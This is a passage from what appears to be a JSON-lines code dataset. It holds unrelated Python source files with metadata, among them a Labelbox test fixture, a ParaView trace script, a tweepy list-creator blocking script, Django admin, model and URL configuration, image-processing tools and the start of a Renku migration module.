['-', '_']}\n for (char, accented_chars) in accents.items():\n for accented_char in accented_chars:\n ligne = ligne.replace(accented_char, char)\n return ligne\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n dimScreen = app.desktop().screenGeometry()\n ui = 
UiMainWindow(dimScreen)\n sys.exit(app.exec_())\n","sub_path":"Linkedin_App.py","file_name":"Linkedin_App.py","file_ext":"py","file_size_in_byte":84191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629204417","text":"import pytest\nfrom labelbox.data.annotation_types.classification.classification import Checklist, ClassificationAnnotation, ClassificationAnswer, Radio\nfrom labelbox.data.annotation_types.geometry.point import Point\nfrom labelbox.data.annotation_types.geometry.rectangle import Rectangle\n\nfrom labelbox.data.annotation_types.video import VideoObjectAnnotation\n\n\n@pytest.fixture\ndef bbox_video_annotation_objects():\n bbox_annotation = [\n VideoObjectAnnotation(\n name=\"bbox\",\n keyframe=True,\n frame=13,\n segment_index=0,\n value=Rectangle(\n start=Point(x=146.0, y=98.0), # Top left\n end=Point(x=382.0, y=341.0), # Bottom right\n ),\n classifications=[\n ClassificationAnnotation(\n name='nested',\n value=Radio(answer=ClassificationAnswer(\n name='radio_option_1',\n classifications=[\n ClassificationAnnotation(\n name='nested_checkbox',\n value=Checklist(answer=[\n ClassificationAnswer(\n name='nested_checkbox_option_1'),\n ClassificationAnswer(\n name='nested_checkbox_option_2')\n ]))\n ])),\n )\n ]),\n VideoObjectAnnotation(\n name=\"bbox\",\n keyframe=True,\n frame=19,\n segment_index=0,\n value=Rectangle(\n start=Point(x=186.0, y=98.0), # Top left\n end=Point(x=490.0, y=341.0), # Bottom right\n ))\n ]\n\n return bbox_annotation\n","sub_path":"tests/integration/annotation_import/fixtures/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287612947","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# get active source.\ncylindervtk = GetActiveSource()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# uncomment following to set a specific view size\n# renderView1.ViewSize = [981, 819]\n\n# show data in view\ncylindervtkDisplay = Show(cylindervtk, renderView1)\n# trace defaults for the display properties.\ncylindervtkDisplay.ColorArrayName = [None, '']\ncylindervtkDisplay.DiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncylindervtkDisplay.BackfaceDiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncylindervtkDisplay.ScalarOpacityUnitDistance = 1.3249258044319845\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# set scalar coloring\nColorBy(cylindervtkDisplay, ('POINTS', 'Temp'))\n\n# rescale color and/or opacity maps used to include current data range\ncylindervtkDisplay.RescaleTransferFunctionToDataRange(True)\n\n# show color bar/color legend\ncylindervtkDisplay.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'Temp'\ntempLUT = GetColorTransferFunction('Temp')\n\n# get opacity transfer function/opacity map for 'Temp'\ntempPWF = GetOpacityTransferFunction('Temp')\n\n# change representation type\ncylindervtkDisplay.SetRepresentationType('Points')\n\n# change representation type\ncylindervtkDisplay.SetRepresentationType('Outline')\n\n# create a new 'Contour'\ncontour1 = Contour(Input=cylindervtk)\ncontour1.ContourBy = ['POINTS', 'AsH3']\ncontour1.Isosurfaces = [0.1326579]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n# show data in 
view\ncontour1Display = Show(contour1, renderView1)\n# trace defaults for the display properties.\ncontour1Display.ColorArrayName = ['POINTS', 'Temp']\ncontour1Display.DiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncontour1Display.LookupTable = tempLUT\ncontour1Display.BackfaceDiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\n\n# show color bar/color legend\ncontour1Display.SetScalarBarVisibility(renderView1, True)\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-49.26490111262243, 7.890473115421582, -3.7460106246471616]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.07999992370605469]\nrenderView1.CameraViewUp = [0.14273026972457897, 0.9746616515350219, 0.17222872911152878]\nrenderView1.CameraParallelScale = 12.951115722667065\n\n#### uncomment the following to render all views\n# RenderAllViews()\n# alternatively, if you want to write images, you can use SaveScreenshot(...).","sub_path":"Code/ParaviewVisualizations/Trace Files/5_cylinder.py","file_name":"5_cylinder.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382947272","text":"import os\nimport tweepy\nfrom dotenv import load_dotenv, find_dotenv\nfrom scripts import error_handler\n\n# Load environment settings.\nload_dotenv(find_dotenv())\n\nCONSUMER_KEY = os.getenv('CONSUMER_KEY')\nCONSUMER_SECRET = os.getenv('CONSUMER_SECRET')\nACCESS_TOKEN = os.getenv('ACCESS_TOKEN')\nACCESS_TOKEN_SECRET = os.getenv('ACCESS_TOKEN_SECRET')\n\n# Set up API.\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n# Fetch lists we've been added to.\nlists = api.lists_memberships()\n\nfor entry in lists:\n try:\n creator_screen_name = entry.user.screen_name\n api.create_block(creator_screen_name)\n print('Blocked @{}, creator of \"{}\".'.format(creator_screen_name, entry.name))\n except Exception as e:\n # Return human readable error message on fail\n error_handler(e.api_code)\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457734164","text":"import Muscle\nimport Weight\nimport MuscleTest\n\ndef main():\n biceps = Muscle.agonistMuscle(\"Biceps Bracii\", 20, 20, 2)\n MuscleTest.leafConstrucTest(biceps, \"Biceps Bracii\", 20, 20, 2)\n \n triceps = Muscle.antagonistMuscle(\"Triceps Bracii\", 33, 33, 4)\n MuscleTest.leafConstrucTest(triceps, \"Triceps Bracii\", 33,33,4)\n \n armMuscles = Muscle.muscleGroup(\"Upper Arm Muscles\")\n MuscleTest.compAddTest(armMuscles, biceps)\n MuscleTest.compAddTest(armMuscles, triceps)\n #armMuscles.addMuscle(biceps)\n #armMuscles.addMuscle(triceps)\n\n handWeight = Weight.weight(15)\n MuscleTest.moveWellTest(armMuscles, handWeight.weight)\n\n handWeight.addWeight(5)\n MuscleTest.moveDecentTest(armMuscles, handWeight.weight)\n\n 
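# Raise the load once more so the strain scenario is exercised as well.\n 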
handWeight.addWeight(10)\n MuscleTest.strainTest(armMuscles,handWeight.weight)\n\n\n '''print(\"\\nStart strength\")\n armMuscles.move(handWeight.weight)\n armMuscles.move(-handWeight.weight)\n\n print('\\n')\n Muscle.reps(armMuscles, 20, handWeight.weight)\n #Muscle.reps(armMuscles, 10, handWeight.weight)\n\n print(\"\\nEnd strength\")\n armMuscles.move(handWeight.weight)\n armMuscles.move(-handWeight.weight)\n print('\\n')'''\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/muscle/MuscleApp.py","file_name":"MuscleApp.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123869240","text":"import tkinter as tk\nimport tkinter.filedialog\nimport numpy as np\nfrom PIL import Image, ImageTk, ImageDraw\n\nnp.seterr('ignore')\n\nmax_width = 3000\nmax_height = 3000\n\n\ndef adapt_image(image):\n s = image.size\n if s[0] > max_width:\n ns = (int(max_width), int(s[1] * max_width / s[0]))\n image = image.resize(ns)\n s = image.size\n if s[1] > max_height:\n ns = (int(s[0] * max_height / s[1]), int(max_height))\n image = image.resize(ns)\n return image\n\n\nclass Win(tk.Frame):\n def __init__(self, root):\n super().__init__()\n self.root = root\n\n self.filename = tk.Entry()\n self.filename.insert(0,'index.jpg')\n self.filename.grid(row=0, column=0)\n\n self.x_field = tk.Entry()\n self.x_label = tk.Label(text=\"Start point (X, Y):\")\n self.x_label.grid(row=0, column=2)\n self.x_field.grid(row=0, column=3)\n\n self.y_field = tk.Entry()\n self.y_field.grid(row=0, column=4)\n\n tk.Button(text='file', command=self.open_file).grid(row=0, column=1)\n tk.Button(text='do', command=self.action).grid(row=0, column=5)\n tk.Button(text='clear', command=self.update_images).grid(row=0, column=6)\n\n self.miniature = 0\n self.processed = 0\n self.processed_miniature = 0\n\n self.open_image()\n self.proc(self.miniature)\n\n self.im = ImageTk.PhotoImage(self.miniature)\n self.iml = tk.Label(image=self.im, cursor='none')\n self.iml.bind(\"\", self.motion)\n self.iml.bind(\"\", self.action)\n self.iml.grid(row=1, column=0, columnspan=7, rowspan=1)\n\n def upd_xy(self, x, y):\n self.x_field.delete(0,tk.END)\n self.x_field.insert(0, str(x))\n self.y_field.delete(0,tk.END)\n self.y_field.insert(0, str(y))\n\n def motion(self, e):\n npim = np.array(self.processed)\n X,Y = npim.shape[:2]\n mx, my = e.y, e.x\n xs = slice(max(0, mx-10), min(X, mx+11))\n ys = slice(max(0, my-10), min(Y, my+11))\n\n glass = Image.fromarray(npim[xs,ys])\n glass = glass.resize((42,42))\n\n glass_draw = ImageDraw.Draw(glass)\n glass_draw.rectangle(((0,0), (41,41)), outline='red')\n glass_draw.rectangle(((20,20), (21,21)), outline='green')\n del glass_draw\n\n self.overlayed = Image.fromarray(npim)\n\n self.overlayed.paste(glass, (my-20, mx-20))\n\n self.overlayed_miniature = adapt_image(self.overlayed)\n self.im = ImageTk.PhotoImage(self.overlayed_miniature)\n self.iml.configure(image=self.im)\n self.upd_xy(mx, my)\n\n @staticmethod\n def in_size(grid, x, y):\n return x >= 0 and x < grid.shape[0] and y >= 0 and y < grid.shape[1]\n\n def _is_border(self, grid, x, y):\n result = Win.in_size(grid, x, y)\n if not result:\n return False\n L = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1), (x - 1, y - 1), (x - 1, y + 1), (x + 1, y - 1),\n (x + 1, y + 1)]\n result = False\n for xy in L:\n result = result or Win.in_size(grid, *xy) and (not (np.all(grid[xy] == grid[x, y])))\n return result\n\n def do(self, grid, npim, x, y, color, used):\n 
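# Walk along the border from (x, y): paint each same-coloured border pixel red, mark it used, and stop when no unvisited border neighbour of that colour remains.\n 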
print(used.shape)\n current = (x, y)\n prev = current\n while True:\n x, y = current\n used[x, y] = 1\n print(x, y)\n grid[x, y][0] = 255\n grid[x, y][1] = 0\n grid[x, y][2] = 0\n L = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1), (x - 1, y - 1), (x - 1, y + 1), (x + 1, y - 1),\n (x + 1, y + 1)]\n for xy in L:\n if self._is_border(npim, *xy) and np.all(npim[xy] == color) and not used[xy]:\n current = xy\n break\n\n if prev == current:\n break\n prev = current\n\n def action(self, e=None):\n x = self.x_field.get()\n y = self.y_field.get()\n try:\n x = int(x)\n except:\n print(\"x value is not correct\")\n return\n try:\n y = int(y)\n except:\n print(\"y value is not correct\")\n return\n npim = np.array(self.image)\n if not self._is_border(npim, x, y):\n print(\"not border\")\n return\n print(\"border\")\n current = (x, y)\n color = (npim[current][0], npim[current][1], npim[current][2])\n print(color)\n grid = npim.copy()\n self.do(grid, npim, x, y, color, np.zeros_like(grid[:,:,0]))\n\n self.processed = Image.fromarray(grid)\n self.processed_miniature = adapt_image(self.processed)\n self.im = ImageTk.PhotoImage(self.processed_miniature)\n self.iml.configure(image=self.im)\n\n def open_file(self):\n fn = tk.filedialog.askopenfilename(initialdir='./images')\n self.filename.delete(0, tk.END)\n self.filename.insert(0, fn)\n self.update_images()\n\n def proc(self, img):\n npim = np.array(img)\n\n self.processed = Image.fromarray(npim)\n self.processed_miniature = adapt_image(self.processed)\n\n def update_images(self):\n self.open_image()\n self.proc(self.miniature)\n\n self.im = ImageTk.PhotoImage(self.miniature)\n self.iml.configure(image=self.im)\n\n def open_image(self):\n try:\n self.image = Image.open(self.filename.get()).convert('RGB')\n except:\n self.image = Image.new('RGB', (1,1))\n self.miniature = adapt_image(self.image)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n w = Win(root)\n tk.mainloop()\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255504487","text":"# -*- coding: utf-8 -*-\n__author__ = 'Leo'\n\nimport numpy as np\nimport utils.files as uf\nimport utils.preprocess as upr\n\n\ndef classify_date(source_file):\n reader = uf.load_data_to_list(source_file)\n\n time_begin = np.datetime64('2008-02-03 08:00:00')\n time_end = np.datetime64('2008-02-03 08:30:00')\n\n (longitude_upper_limit, longitude_floor) = (117, 115.9)\n (latitude_upper_limit, latitude_floor) = (40.5, 39.5)\n\n arrays = []\n\n for arr in reader:\n time = np.datetime64(arr[1])\n longitude = float(arr[2])\n latitude = float(arr[3])\n if time >= time_begin and time < time_end and longitude <= longitude_upper_limit and \\\n longitude >= longitude_floor and latitude <= latitude_upper_limit and latitude >= latitude_floor:\n arrays.append(arr)\n\n return arrays\n\n\nif __name__ == '__main__':\n reader = classify_date('test\\\\data_preprocess.txt')\n # Whether to remove duplicates, keeping the first item\n # reader = upr.remove_repetition(reader, 0)\n uf.write_in_file('test\\\\classify_time.txt', reader)","sub_path":"examples/beijing_taxi_data/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"582900638","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# */AIPND-revision/intropyproject-classify-pet-images/get_pet_labels.py\n#\n# PROGRAMMER: Emily Kern\n# DATE 
CREATED: January 6, 2019\n# REVISED DATE: January 30, 2019\n# PURPOSE: Create the function get_pet_labels that creates the pet labels from\n# the image's filename. This function inputs:\n# - The Image Folder as image_dir within get_pet_labels function and\n# as in_arg.dir for the function call within the main function.\n# This function creates and returns the results dictionary as results_dic\n# within get_pet_labels function and as results within main.\n# The results_dic dictionary has a 'key' that's the image filename and\n# a 'value' that's a list. This list will contain the following item\n# at index 0 : pet image label (string).\n#\n# Imports python modules\nfrom os import listdir\nfrom os.path import splitext\n\n# makes for easier formatting for label\ndef prettify(name):\n new_name = ''\n formatter = splitext(name)[0] # drop the file extension first\n formatter = formatter.split(\"_\")\n for word in formatter:\n if word.isalpha(): # skips numeric tokens such as '02259'\n new_name += (word + ' ')\n new_name = (new_name.rstrip()).lower() # removes trailing white space and lowercases it\n return new_name\n\ndef get_pet_labels(image_dir):\n \"\"\"\n Creates a dictionary of pet labels (results_dic) based upon the filenames\n of the image files. These pet image labels are used to check the accuracy\n of the labels that are returned by the classifier function, since the\n filenames of the images contain the true identity of the pet in the image.\n Be sure to format the pet labels so that they are in all lower case letters\n and with leading and trailing whitespace characters stripped from them.\n (ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')\n Parameters:\n image_dir - The (full) path to the folder of images that are to be\n classified by the classifier function (string)\n Returns:\n results_dic - Dictionary with 'key' as image filename and 'value' as a\n List. 
The list contains the following item:\n index 0 = pet image label (string)\n \"\"\"\n results_dic = {}\n images = listdir(image_dir)\n for image in images:\n if not image.startswith('.'): # hidden directories and files not allowed\n label = prettify(image)\n results_dic[image] = [label]\n return results_dic\n","sub_path":"intropyproject-classify-pet-images/get_pet_labels.py","file_name":"get_pet_labels.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356298261","text":"import pandas as pd\nimport os\nimport numpy as np\nfrom numpy.distutils.misc_util import is_sequence\nfrom bs4 import BeautifulSoup # this is to extract info from the xml, if we use it in the end\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom PIL import Image\nimport json\nimport pickle\n\ndef plot_iou(num, input, test=False):\n fig, ax = plt.subplots(1)\n if test:\n identifier = \"Test\"\n print(identifier)\n img_tensor = imgs_test[num]\n annotation = annotations_test[num]\n prediction = preds_test[num]\n else:\n identifier = \"Train\"\n print(identifier)\n img_tensor = imgs[num]\n annotation = annotations[num]\n prediction = preds_train[num]\n\n img = img_tensor.cpu().data\n img = img[0, :, :]\n annotation_boxes = annotation[\"boxes\"].tolist()\n\n if local_mode:\n ax.imshow(img, cmap='gray')\n\n ix = 0\n for box in annotation[\"boxes\"]:\n xmin, ymin, xmax, ymax = box.tolist()\n value = annotation[\"labels\"][ix]\n img_id = annotation[\"image_id\"].item()\n file_name = master_csv.loc[img_id, :].image_path\n set = file_name.split(\"/\")[7]\n video = file_name.split(\"/\")[8]\n file_name = file_name.split(\"/\")[10]\n file_name = file_name[:-4]\n output_name = set + \"_\" + video + \"_\" + file_name + \"_\" + identifier\n text = Recode(value)\n colors = [\"r\", \"r\", \"r\"]\n rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1,\n edgecolor=colors[value], facecolor='none')\n target_x = xmin\n target_y = ymin - 5\n ax.text(target_x, target_y, text, color=colors[value])\n ax.add_patch(rect)\n ix += 1\n\n ix = 0\n voc_iou = []\n print(\n f'{len(prediction[\"boxes\"])} prediction boxes made for {len(annotation[\"boxes\"])} actual boxes in {str(output_name)} for {identifier} with note {input} (INDEX {num})')\n for box in prediction[\"boxes\"]:\n xmin, ymin, xmax, ymax = box.tolist()\n\n iou_list = []\n for bound in annotation_boxes:\n a_xmin, a_ymin, a_xmax, a_ymax = bound\n xA = max(xmin, a_xmin)\n yA = max(ymin, a_ymin)\n xB = min(xmax, a_xmax)\n yB = min(ymax, a_ymax)\n interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n p_area = (xmax - xmin + 1) * (ymax - ymin + 1)\n a_area = (a_xmax - a_xmin + 1) * (a_ymax - a_ymin + 1)\n iou = interArea / float(p_area + a_area - interArea)\n iou_list.append(iou)\n max_val = max(iou_list)\n voc_iou.append(max_val)\n\n max_ix = iou_list.index(max_val)\n map_dict = {max_ix: max_val}\n\n # iou_string = ', '.join((str(float) for float in iou_list))\n value = prediction[\"labels\"][ix]\n text = json.dumps(map_dict)\n colors = [\"r\", \"#00FF00\", \"#0000FF\"]\n rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1,\n edgecolor=colors[value], facecolor='none')\n target_x = xmin\n target_y = ymin - 5\n ax.text(target_x, target_y, text, color=colors[value])\n ax.add_patch(rect)\n ix += 1\n\n if local_mode:\n plt.show()\n\n if len(voc_iou) == 0:\n mean_iou = 0\n print(f'No predictions made so Mean IOU: 
{mean_iou}')\n else:\n mean_iou = sum(voc_iou) / len(voc_iou)\n fp = voc_iou.count(0) / len(voc_iou) * 100\n bp = sum((i > 0 and i < 0.5) for i in voc_iou) / len(voc_iou) * 100\n gp = sum((i >= 0.5) for i in voc_iou) / len(voc_iou) * 100\n print(f'{fp} false positives (IOU = 0)')\n print(f'{bp} bad positives (0 < IOU < 0.5)')\n print(f'{gp} good positives (IOU >= 0.5)')\n print(f'Mean IOU: {mean_iou}')\n\n figname = output_name + \"_\" + input + \".png\"\n fig.savefig(file_output_path + figname)\n #print(f'Figure {figname} saved to {directory}.')","sub_path":"src/plot_iou.py","file_name":"plot_iou.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415516365","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\n\n\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n\n ADMIN_FIELDS = UserAdmin.fieldsets\n CUSTOM_FIELDS = (\n (\n \"CustomFields\",\n {\n \"fields\": (\n \"authority\",\n ),\n },\n ),\n )\n\n fieldsets = ADMIN_FIELDS + CUSTOM_FIELDS\n\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"authority\",\n )\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106116394","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.views.generic.base import TemplateView\n\n# REST FRAMEWORK\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\nfrom users.views import UserViewSet\nfrom petgram.views import PostViewSet, CommentViewSet\n\n# REST REGISTRATION\nfrom rest_registration.api.views import (\n register,\n change_password\n)\n\n# SIMPLE JWT\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\n\nadmin.site.site_header = \"Petgram Admin\"\nadmin.site.site_title = \"Petgram Admin Portal\"\nadmin.site.index_title = \"Welcome to Petgram Administration Portal\"\nadmin.site.site_url = \"/api/v1/\"\n\n# api router\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r\"users\", UserViewSet)\nrouter.register(r\"posts\", PostViewSet)\nrouter.register(r\"comments\", CommentViewSet)\n\n# jwt urls\n# http://domain.com/api/v1/token/...\n\nauth_urlpatterns = [\n path('/login', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('/refresh', TokenRefreshView.as_view(), name='token_refresh'),\n path('/change-password', change_password, name='change_password'),\n path('/register', register, name='register'),\n]\n\n# api docs urls\n# http://domain.com/api/v1/docs\n\napi_docs = [\n # Swagger\n path('', TemplateView.as_view(\n template_name='swagger.html',\n extra_context={'schema_url': 'openapi-schema'}\n ), name='swagger-ui'),\n\n # OpenAPI\n path('/openapi', get_schema_view(\n title=\"Petgram API docs\",\n description=\"SHM Development Challenge API\",\n version=\"1.0.0\",\n ), name='openapi-schema'),\n\n]\n\n# api urls\n# http://domain.com/api/v1/\n\napi_urlpatterns = [\n path('/', include(router.urls)),\n path('/accounts', include(auth_urlpatterns)),\n path('/docs', include(api_docs))\n]\n\n\n\n# http://domain.com/\nurlpatterns = [\n path('', admin.site.urls), # admin site urls\n path('api/v1', include(api_urlpatterns)), # api v1.0\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341610710","text":"import os\nfrom configparser import ConfigParser\nBASE_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))),'config.ini')\nimport top.api\nconf = ConfigParser()\nconf.read(BASE_DIR)\n\n\n\n# req=top.api.JuItemsSearchRequest('http://127.0.0.1','8000')\n# req.set_app_info(top.appinfo(conf.get('taobao','appkey'),conf.get('taobao','secret')))\n# header = {\n# \t\"current_page\":1,\n# \t\"page_size\":20,\n# \t\"pid\":'',\n# \t\"postage\":True,\n# \t\"status\":2,\n# \t\"taobao_category_id\":'973700308',\n# \t\"word\":''\n# }\n# req.param_top_item_query=header\n# try:\n# \tresp= req.getResponse()\n# \tprint('',resp)\n# except Exception as e:\n# \tprint('error',e)\n\n\nreq=top.api.TbkUatmFavoritesGetRequest()\nreq.set_app_info(top.appinfo(conf.get('taobao','appkey'),conf.get('taobao','secret')))\n\nreq.page_no=1\nreq.page_size=20\nreq.fields=\"favorites_title,favorites_id,type\"\nreq.type=-1\nresp= 
req.getResponse()\nprint(resp)\n\n# try:\n# \tresp= req.getResponse()\n# \tprint(resp)\n# except Exception as e:\n# \tprint(e)","sub_path":"apps/sdk/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"529584341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n# Custom\nfrom .constances import STATES_TASK, STATE_TASK_DEFAULT\nfrom lists.models import TaskList\n\n\nclass Task(models.Model):\n \"\"\"\n Task model\n \"\"\"\n name = models.CharField(\n max_length=200,\n verbose_name=u'Name'\n )\n description = models.CharField(\n max_length=200,\n verbose_name='Description'\n )\n tasklist = models.ForeignKey(\n TaskList,\n related_name='tasks',\n verbose_name='Task list'\n )\n state = models.CharField(\n choices=STATES_TASK,\n default=STATE_TASK_DEFAULT,\n max_length=200,\n verbose_name=u'State'\n )\n order = models.IntegerField(\n default=0,\n verbose_name=u'Order'\n )\n\n def __unicode__(self):\n return \"%s - %s\" % (self.name, self.state)\n\n class Meta:\n ordering = [\"-order\"]\n verbose_name = u'Task'\n verbose_name_plural = u'Tasks'\n\n @property\n def owner(self):\n \"\"\"\n Return the user that the list belongs to\n \"\"\"\n return self.tasklist.user\n","sub_path":"tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457594616","text":"#\n# Copyright 2017-2023 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Migration models V9.\"\"\"\n\nimport datetime\nimport os\nimport posixpath\nimport re\nimport uuid\nimport weakref\nfrom bisect import bisect\nfrom collections import OrderedDict\nfrom copy import copy\nfrom functools import total_ordering\nfrom pathlib import Path\nfrom typing import Type, Union\nfrom urllib.parse import quote, urljoin, urlparse\n\nimport attr\nfrom attr.validators import instance_of\nfrom marshmallow import EXCLUDE, pre_dump\n\nfrom renku.command.schema.agent import PersonSchema\nfrom renku.command.schema.annotation import AnnotationSchema\nfrom renku.command.schema.calamus import (\n DateTimeList,\n JsonLDSchema,\n Nested,\n StringList,\n Uri,\n fields,\n oa,\n prov,\n rdfs,\n renku,\n schema,\n)\nfrom renku.command.schema.project import ProjectSchema as V10ProjectSchema\nfrom renku.core import errors\nfrom renku.core.migration.migrate import SUPPORTED_PROJECT_VERSION\nfrom renku.core.migration.models import v10 as new_schema\nfrom renku.core.migration.models.refs import LinkReference\nfrom renku.core.migration.utils import (\n OLD_METADATA_PATH,\n generate_dataset_file_url,\n generate_dataset_id,\n generate_dataset_tag_id,\n generate_url_id,\n get_datasets_path,\n)\nfrom 
renku.core.util import yaml as yaml\nfrom renku.core.util.datetime8601 import fix_datetime, parse_date\nfrom renku.core.util.doi import extract_doi, is_doi\nfrom renku.core.util.git import get_in_submodules\nfrom renku.core.util.urls import get_host, get_slug\nfrom renku.domain_model.dataset import generate_default_name\nfrom renku.domain_model.project_context import project_context\nfrom renku.infrastructure.repository import Commit\nfrom renku.version import __version__, version_url\n\nwfprov = fields.Namespace(\"http://purl.org/wf4ever/wfprov#\")\nPROJECT_URL_PATH = \"projects\"\nRANDOM_ID_LENGTH = 4\n\n\ndef _set_entity_commit(entity, commit):\n \"\"\"Set the commit of an entity.\"\"\"\n if not entity.commit:\n revision = \"UNCOMMITTED\"\n if entity._label:\n revision = entity._label.rsplit(\"@\", maxsplit=1)[-1]\n if revision == \"UNCOMMITTED\":\n commit = commit\n elif project_context.has_context():\n commit = project_context.repository.get_commit(revision)\n entity.commit = commit\n\n\ndef _str_or_none(data):\n \"\"\"Return str representation or None.\"\"\"\n return str(data) if data is not None else data\n\n\ndef generate_project_id(name, creator):\n \"\"\"Return the id for the project based on the repository origin remote.\"\"\"\n\n # Determine the hostname for the resource URIs.\n # If RENKU_DOMAIN is set, it overrides the host from remote.\n # Default is localhost.\n host = \"localhost\"\n\n if not creator:\n raise ValueError(\"Project Creator not set\")\n\n owner = creator.email.split(\"@\")[0]\n\n if project_context.has_context():\n remote = project_context.remote\n host = remote.host or host\n owner = remote.owner or owner\n name = remote.name or name\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n if name:\n name = quote(name, safe=\"\")\n else:\n raise ValueError(\"Project name not set\")\n\n project_url = urljoin(f\"https://{host}\", posixpath.join(PROJECT_URL_PATH, owner, name))\n return project_url\n\n\n@attr.s(slots=True)\nclass Project:\n \"\"\"Represent a project.\"\"\"\n\n name = attr.ib(default=None)\n\n created = attr.ib(converter=parse_date)\n\n version = attr.ib(converter=str, default=str(SUPPORTED_PROJECT_VERSION))\n\n agent_version = attr.ib(converter=str, 